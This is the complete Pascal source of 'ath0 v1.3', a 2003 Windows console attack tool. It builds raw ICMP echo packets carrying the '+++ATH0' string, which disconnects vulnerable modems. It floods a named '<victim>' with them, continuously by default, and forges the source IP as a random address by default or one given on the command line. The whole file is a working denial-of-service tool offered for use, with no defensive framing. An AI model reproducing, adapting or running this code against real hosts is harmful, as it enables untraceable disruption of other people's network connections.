{
  ************************************************************************
  *                                                                      *
  *    ath0 v1.3                                                         *
  *                                                                      *
  *    Release Date: 09 Aug 2003                                         *
  *                                                                      *
  *    http://www.loranbase.com                                          *
  *                                                                      *
  ************************************************************************
}

program ath;

{$APPTYPE CONSOLE}

uses
  Windows, Winsock;

const
  Banner = #13#10'ath0 v1.3 [09 Aug 2003]'#13#10#13#10 +
                 'http://www.loranbase.com'#13#10;

type
  TAthOpt = packed record
    Delay, Num, Sended, Source: Cardinal;
    SockAddr: TSockAddrIn;
    RandomSeek: Integer;
    Socket: TSocket;
  end;

  WordArray = ^TWordArray;
  TWordArray = array [0..0] of Word;

  PIPhdr = ^TIPhdr;
  TIPhdr = packed record
    ip_verlen: Byte;
    ip_tos: Byte;
    ip_len: Word;
    ip_id: Word;
    ip_off: Word;
    ip_ttl: Byte;
    ip_p: Byte;
    ip_sum: Word;
    ip_src: Cardinal;
    ip_dst: Cardinal;
  end;

  PICMPhdr = ^TICMPhdr;
  TICMPhdr = packed record
    icmp_type: Byte;
    icmp_code: Byte;
    icmp_sum: Word;
    icmp_id: Word;
    icmp_seq: Word;
  end;

function CheckSum(data: WordArray; size: Integer): Word;
var
  i, sum: Integer;
begin
  sum := 0;
  i := 0;
  while size > 1 do begin
    Inc(sum, data^[i]);
    Dec(size, 2);
    Inc(i);
  end;
  if size <> 0 then
    Inc(sum, data^[i]);
  sum := (sum shr 16) + (sum and $ffff);
  Inc(sum, sum shr 16);
  Result := not sum;
end;

var
  WSAData: TWSAData;
  UseDelay: Boolean;
  AthOpt: TAthOpt;
  LastUpdate: Cardinal = 0;

function StrToIntDef(const S: string; Default: integer): integer;
var
  E: integer;
begin
  Val(S, Result, E);
  if E <> 0 then Result := Default;
end;

function InttoStr(const Value: integer): string;
var
  S: string[11];
begin
  Str(Value, S);
  Result := S;
end;

function ExtractFileName(const Path: string): string;
var
  i, L: integer;
  Ch: Char;
begin
  L := Length(Path);
  for i := L downto 1 do
  begin
    Ch := Path[i];
    if (Ch = '\') or (Ch = '/') then
    begin
      Result := Copy(Path, i + 1, L - i);
      Break;
    end;
  end;
end;

function CanUpdate(const DelayValue: Cardinal; const Force: Boolean): Boolean;
begin
  Result := Force or ((GetTickCount - LastUpdate) >= DelayValue);
  if Result then LastUpdate := GetTickCount;
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  AthOpt.RandomSeek := (AthOpt.RandomSeek xor Range) + 1;
  Result := (Random(High(Integer)) xor AthOpt.RandomSeek) mod Range;
end;

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <victim> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -s:    Spoof host     (0 is random (default))'#13#10 +
        '  -n:    Num of packets (0 is continuous (default))'#13#10 +
        '  -d:    Delay (in ms)  (default 0)'#13#10
       );
  Halt(0);
end;

procedure CreateSocket; // procedure for creating a raw socket
begin
  AthOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // create a socket
  if AthOpt.Socket = INVALID_SOCKET then // exit if couldn't create a socket
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(AthOpt.Socket, IPPROTO_IP, 2, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

procedure SetDefaultOptions;
begin
  AthOpt.SockAddr.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  AthOpt.SockAddr.sin_family := AF_INET;
  AthOpt.SockAddr.sin_port := GetRandomValue(High(Word)) + 1;
end;

procedure SetParams;
var
  i: integer;
  pstr: string;
  Ch: Char;
begin
  for i := 2 to ParamCount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    case Ch of
      's': AthOpt.Source := Resolve(PChar(ParamStr(i + 1)));
      'n': AthOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': AthOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

const
  Data = '+++ATH0'#13#10;
  Len = 28 + Length(Data);

var
  Buf: array [0..(Len - 1)] of Char;
  IPhdr: PIPhdr = @Buf[0];
  ICMPhdr: PICMPhdr = @Buf[20];
  
procedure SendAth;

  procedure SendAth_FillIPhdr;
  begin
    IPhdr.ip_verlen := $45;
    IPhdr.ip_tos := 0;
    IPhdr.ip_len := htons(Len);
    IPhdr.ip_id := GetRandomValue(High(Word)) + 1;
    IPhdr.ip_ttl := 255;
    IPhdr.ip_p := 1;
    if AthOpt.Source = 0 then
      IPhdr.ip_src := GetRandomIP
    else
      IPhdr.ip_src := AthOpt.Source;
    IPhdr.ip_dst := AthOpt.SockAddr.sin_addr.S_addr;
    IPhdr.ip_sum := CheckSum(@IPhdr^, 20);
  end;

begin
  FillChar(Buf, Sizeof(Buf), 0);
  Move(Data[1], Buf[28], Length(Data));
  SendAth_FillIPhdr;
  ICMPhdr.icmp_type := 8;
  ICMPhdr.icmp_sum := CheckSum(@ICMPhdr^, Len - 20);
  Sendto(AthOpt.Socket, Buf, Len, 0, AthOpt.SockAddr, Sizeof(AthOpt.SockAddr));
end;

begin
  Writeln(Banner);
  if ParamCount < 1 then
    Usage(ExtractFileName(ParamStr(0)));
  WSAStartUp($0101, WSAData);
  FillChar(AthOpt, Sizeof(AthOpt), 0);
  CreateSocket;
  try
    Randomize;
    SetDefaultOptions;
    if ParamCount > 2 then
      SetParams;
    UseDelay := AthOpt.Delay > 0;
    repeat
      SendAth;
      Inc(AthOpt.Sended);
      if CanUpdate(50, AthOpt.Sended = AthOpt.Num) then
        SetConsoleTitle(PChar('Count: ' + InttoStr(AthOpt.Sended) + '/' +
                              InttoStr(AthOpt.Num)));
      if UseDelay then
        Sleep(AthOpt.Delay);
    until
      AthOpt.Sended = AthOpt.Num;
  finally
    CloseSocket(AthOpt.Socket);
    WSACleanUp;
  end;
end.
